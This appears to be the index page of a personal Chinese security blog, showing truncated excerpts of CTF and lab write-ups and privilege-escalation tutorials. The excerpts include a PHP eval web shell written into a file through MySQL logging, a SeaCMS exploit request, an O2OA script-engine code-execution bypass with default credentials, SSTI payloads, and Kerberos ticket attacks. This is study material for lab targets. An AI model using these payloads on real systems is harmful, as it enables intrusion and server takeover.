晴川's Blog🌈

PT-4flag01首先进行信息搜集 密码猜测是root/cyberstrikelab 1select @@plugin_dir 1show variables like 'secure%'; 发现secure_file_priv为空，说明我们没法打udf了 尝试去load_file一下 1234set global general_log ="ON"; #开启日志详解set global general_log_file='C:\\www\\a.php'; #设置路径select'<?php @eval($_POST[123]);?>'; 再次访问发现权限不允许，应该是主机有杀软给杀死了，换个路径写个免杀马 12set global general_log_file='C:\\www\\1.php';select "<?php $a="a"."s"; $b="s".&qu ...

第五章 Windows 实战-evtx 文件分析flag01 将黑客成功登录系统所使用的IP地址作为Flag值提交； 成功登录的事件id是4624查找即可 flag02 黑客成功登录系统后修改了登录用户的用户名，将修改后的用户名作为Flag值提交； 筛选用户账户修改事件： 事件ID 4781 ：记录用户账户名更改，包含旧账户名和新账户名。 检查事件详情中的 New Account Name 字段，即修改后的用户名。 事件ID 4738（非域环境）或 事件ID 4723（域环境）：账户属性修改事件，需确认是否包含用户名变更。 flag03 黑客成功登录系统后成功访问了一个关键位置的文件，将该文件名称（文件名称不包含后缀）作为Flag值提交 *定位文件访问事件**： 事件ID 4663 （文件/文件夹访问）： 检查 Object Name 字段，显示文件完整路径（如 C:\KeyFiles\secret_2023.txt）。 事件ID 4656 （文件系统操作请求）： 若启用了详细文件审核策略，可辅助验证访问行为。 flag04 4.黑 ...

PT-1flag01提示是海洋cms 经过尝试发现路径是cslab下 路径测试发现用户名密码都是cslab 网上漏洞直接打，稍微改下路径和ip 12345678910111213141516POST /cslab/admin_notify.php?action=set HTTP/1.1Host: 10.0.0.68Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Cookie: PHPSESSID=mg3cn8od4bduf2deq93f00jpg7Referer: http://10.0.0.68/cslab/admin_notify.phpAccept-Language: zh-CN,zh;q=0.9Origin: http://1 ...

2025 HgameCTFWebLevel 24 Pacman一个游戏题罢了 调出控制台 base64+栅栏解密 hgame{u_4re_pacman_m4ster} Level 47 BandBomb123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990const express = require('express');const multer = require('multer');const fs = require('fs');const path = require('path');const app = express();app.set('view engine', 'ejs& ...

内网渗透-白银票据和黄金票据前言前面打靶场会经常遇到白银票据和黄金票据的说法，当时只是做了解，学做法，并没有去了解过相应的概念啥的。 票据传递攻击（PtT）是一种使用Kerberos票据代替明文密码或NTLM哈希的方法。PtT最常见的用途可能是使用黄金票据和白银票据，通过PtT访问主机相当简单。 我们先来了解一下票据产生的背景 个人文件还是公司文件以及服务都存在于一台系统上，所有人都要去一台机器办公，效率非常低，为每个人分配了电脑以后就需要考虑安全问题，如何让服务器正确识别每一个人，假定所有数据包在传输过程中都可以被任意截取和修改。在每一台电脑上都存入所有人的账户密码是不现实的，所以引入一个认证服务统一管理所有的用户密码。假设用户访问邮件服务，认证服务让你提供密码以此来证明身份，它把你提供的密码和数据库中的密码相比较，通过认证，认证服务不会提供给你任何密码，不然下次你就可以不认证直接利用密码登录，认证服务会给你一张票，拿到票后，你把此票给邮件服务，以此来证明你的身份。需要解决的问题，每次使用还没有得到票的服务前，都必须给认证密码。比如使用邮件服务，就要输入一次。使用文件服务，又要输入 ...

春秋云境-CloudNetflag01fscan扫一扫 8080端口存在02oa http://39.98.124.230:8080/x_desktop/index.html 默认密码： 1xadmin/o2oa@2022 创建一个新的服务 https://github.com/o2oa/o2oa/issues/159 漏洞本质是利用ScriptEngineManager类进行命令执行，只对java.lang.Class做限制肯定可以绕过的，这里直接用java.lang.ClassLoader去加载java.lang.Runtime实现绕过 12345678910var a = mainOutput(); function mainOutput() { var classLoader = Java.type("java.lang.ClassLoader"); var systemClassLoader = classLoader.getSystemClassLoader(); var runtimeMethod = systemCl ...

2025 西湖论剑Misc糟糕的硬盘1sudo mdadm --examine 1.img 通过检查每个镜象发现，是 RAID 为每个镜像文件创建一个虚拟块设备 12345sudo losetup /dev/loop0 1.imgsudo losetup /dev/loop1 2.imgsudo losetup /dev/loop2 3.imgsudo losetup /dev/loop3 4.imgsudo losetup /dev/loop4 5.img 组合起来 1sudo mdadm --assemble /dev/md0 /dev/loop0 /dev/loop5 /dev/loop2 /dev/loop3 /dev/loop4 1sudo mount /dev/md0 /mnt 发现挂载成功了 拿到key.png和secret 利用Veracrypto，secret是加密卷，key.png是加密文件即可得到flag WebRank-l存在ssti,ID出ssti,密码随便输，抓包看回显 12{{lipsum.__globals__.get( ...

2025i春秋冬季杯MiscSee anything in these pics?最开始Aztec码解密得到5FIVE 用来去解压缩包 之后得到一张图片 010查看末尾多出来一张图片，手动分离 拖入随波逐流即可得到 简单镜像提取流量包中看到一个压缩包，原始数据提出来得到 还原为压缩包 得到一个镜象，根据题目描述RR_studio 想到RStudio 用RStudio打开恢复数据找到flag 压力大，写个脚本吧压缩包里给的密码base64解密后即为压缩包Mima 写个脚本批量解压，后面得到hint，提示password+password.png 把密码拼起来得到一张图片 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495969798991001011021031041051 ...

权限提升–windows下的提权windows权限提升主要包含以下内容： 后台权限：SQL注入，数据库泄漏，弱口令攻击，未授权访问等造成数据库权限：SQL注入，数据库泄漏，弱口令攻击，未授权访问等造成Web权限：RCE,反序列化,文件上传等直达或通过后台数据库间接造成计算机用户权限：弱口令,数据泄漏等直达或通过Web，服务器及域控转移造成计算机系统权限：系统内核漏洞,钓鱼后门攻击,主机软件安全直达或上述权限提升造成宿主机权限：Docker不安全配置或漏洞权限提升直达（服务资产造成入口后提升）域控制器权限：内网域计算机用户提升或自身内核漏洞，后门攻击，主机软件安全直达 前期信息搜集后进行EXP获取 EXP获取KernelHub 针对常用溢出编号指定找EXPhttps://github.com/Ascotbe/Kernelhub Poc-in-Github 针对年份及编号指定找EXPhttps://github.com/nomi-sec/PoC-in-GitHub 提权方式数据库提权MYSQL UDF 提权 UDF 提权原理 UDF 指的是用户自定义函 数，用户可以对数据库所使用的函 ...

权限提升-windows下的信息收集前言前面打了好久的春秋云镜，纯粹是在靠刷题来零零散散的学习渗透。期末周课程设计做完了，来打打基础，学学写写 服务器信息枚举版本信息查看系统版本号： 1ver 架构信息获取到服务器架构信息，有助于后续选择对应的漏洞利用程序或编写exp和payload 1wmic os get osarchitecture 或 1echo %PROCESSOR_ARCHITECTURE% 服务信息获取服务信息可以得知系统服务的进程ID、启动方式和状态，效果类似于运行services.msc 1sc query state=all 或 1wmic service list brief powershell命令获取服务及服务对应的执行文件路径和参数： 1Get-wmiObject win32_service | select Name,PathName 进程信息获取系统进程: 1tasklist 获取进程信息: 1tasklist /svc 使用wmic命令获取系统进程信息： 1wmic process list brief 也可以使用powershell ...